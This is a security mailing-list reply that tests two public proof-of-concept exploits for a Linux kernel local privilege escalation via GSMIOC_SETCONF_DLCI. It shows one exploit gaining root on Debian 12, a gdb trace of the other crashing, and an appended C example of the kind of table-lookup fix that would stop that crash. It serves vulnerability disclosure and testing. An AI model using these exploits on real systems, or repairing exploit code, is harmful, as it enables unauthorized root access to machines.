From: "Dr. Christopher Kunz" <info@christopher-kunz.de>
To: oss-security@lists.openwall.com
Date: Thu, 11 Apr 2024 10:32:59 +0200
Subject: Re: [oss-security] New Linux LPE via GSMIOC_SETCONF_DLCI?
In-Reply-To: <607d5716-128f-44c5-ab52-6dde4ca6e8a4@christopher-kunz.de>

FWIW, on a freshly installed and fully updated default Debian 12 VM (from
the current netinst iso), the first two exploits yield different results.

> PoC and writeup are here:
> https://github.com/YuriiCrimson/ExploitGSM/tree/main

This, let's call it "Yurii's version", works as advertised:

$ ./ExploitGSM debian
kallsyms restricted, begin retvial kallsyms table
detected kernel path-> /boot/vmlinuz-6.1.0-18-amd64
detected compressed format -> xz
Uncompressed kernel size -> 65902908
successfully taken kernel!
begin try leak startup_xen!
startup_xen leaked address  -> ffffffff8c86f1c0
text leaked address         -> ffffffff8a800000
lockdep_map_size     -> 32
spinlock_t_size      -> 4
mutex_size           -> 32
gsm_mux_event_offset -> 56
Let go thread
We get root, spawn shell
root@debianexploitgsm:/root# id
uid=0(root) gid=0(root) groups=0(root)

> PoC:
> https://github.com/jmpe4x/GSM_Linux_Kernel_LPE_Nday_Exploit/tree/main

This one, however, segfaults. I recompiled it with debugging symbols and
ran it through a quick gdb:

Reading symbols from ./ExploitGSM...
(gdb) run debian
Starting program: /home/absynth/GSM_Linux_Kernel_LPE_Nday_Exploit/ExploitGSM debian
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00000000004324f7 in __strcmp_avx2 ()
(gdb) bt
#0  0x00000000004324f7 in __strcmp_avx2 ()
#1  0x0000000000401b5e in main (argc=2, argv=0x7fffffffe3f8) at /home/absynth/GSM_Linux_Kernel_LPE_Nday_Exploit/main.c:552
(gdb)

Line 552 is the kernel release check, so a fairly straightforward piece of
code:

        if (strcmp(iter_kernel->os_name, argv[1]) || strcmp(iter_kernel->kernel, kernel_info.release))

I'm not a C developer, so I'm not too sure what goes wrong here, but I
guess it's a simple fix.

With regards to Yurii's PoC, I'd say that this can indeed be classified as
a working 0day LPE in the default configuration. We don't have a CVE for
this yet, do we?

Regards,
--cku
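The crash above is inside strcmp(), called from a per-distribution kernel lookup. The message does not say what the faulting pointer was, and the following is not the exploit's code; it is an added, self-contained example of how a lookup of that shape is written so that an unsupported kernel (the Debian 6.1.0-18 release in the log is absent from the constructed table below) is reported instead of crashing. A strcmp() argument that is NULL, for instance the sentinel at the end of a table that the loop ran past, faults exactly as shown in the backtrace, so the lookup stops at the sentinel and the caller checks for a NULL result. The struct name, field names and the offsets in the table are assumptions for this example only.

```c
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

/* Hypothetical table entry. Field names are assumptions for this example,
 * not the layout used by either exploit. */
struct kernel_entry {
    const char *os_name;                /* distro tag given as argv[1] */
    const char *release;                /* uname -r string the offsets belong to */
    unsigned long gsm_mux_event_offset; /* constructed value, illustrative only */
};

/* Constructed sample table. The NULL entry is the end-of-table sentinel;
 * passing its os_name to strcmp() would dereference NULL and fault. */
static const struct kernel_entry kernel_table[] = {
    { "ubuntu", "6.5.0-21-generic", 56 },
    { "debian", "6.1.0-17-amd64",   56 },
    { NULL,     NULL,               0  }
};

/* Bounded lookup: stops at the sentinel, never calls strcmp() on NULL, and
 * returns NULL when no entry matches both the distro tag and the release. */
const struct kernel_entry *find_kernel(const char *os_name, const char *release)
{
    if (os_name == NULL || release == NULL)
        return NULL;
    for (const struct kernel_entry *e = kernel_table; e->os_name != NULL; e++) {
        if (strcmp(e->os_name, os_name) == 0 && strcmp(e->release, release) == 0)
            return e;
    }
    return NULL;
}

/* Resolves the running kernel via uname(2) and looks it up.
 * Returns 0 and stores the offset on a hit, 1 (with a message) otherwise. */
int check_running_kernel(const char *os_name, unsigned long *offset_out)
{
    struct utsname u;
    if (uname(&u) != 0) {
        perror("uname");
        return 1;
    }
    const struct kernel_entry *e = find_kernel(os_name, u.release);
    if (e == NULL) {
        fprintf(stderr, "unsupported kernel: %s %s (no offsets in table)\n",
                os_name ? os_name : "(null)", u.release);
        return 1;
    }
    if (offset_out != NULL)
        *offset_out = e->gsm_mux_event_offset;
    return 0;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <os_name>\n", argv[0]);
        return 2;
    }
    unsigned long off;
    if (check_running_kernel(argv[1], &off) != 0)
        return 1;
    printf("gsm_mux_event_offset -> %lu\n", off);
    return 0;
}
```

Run as ./a.out debian on a kernel whose release is not in the table and it prints "unsupported kernel: debian <release>" and exits 1; the same input against the unbounded loop form is where a NULL sentinel ends up in strcmp().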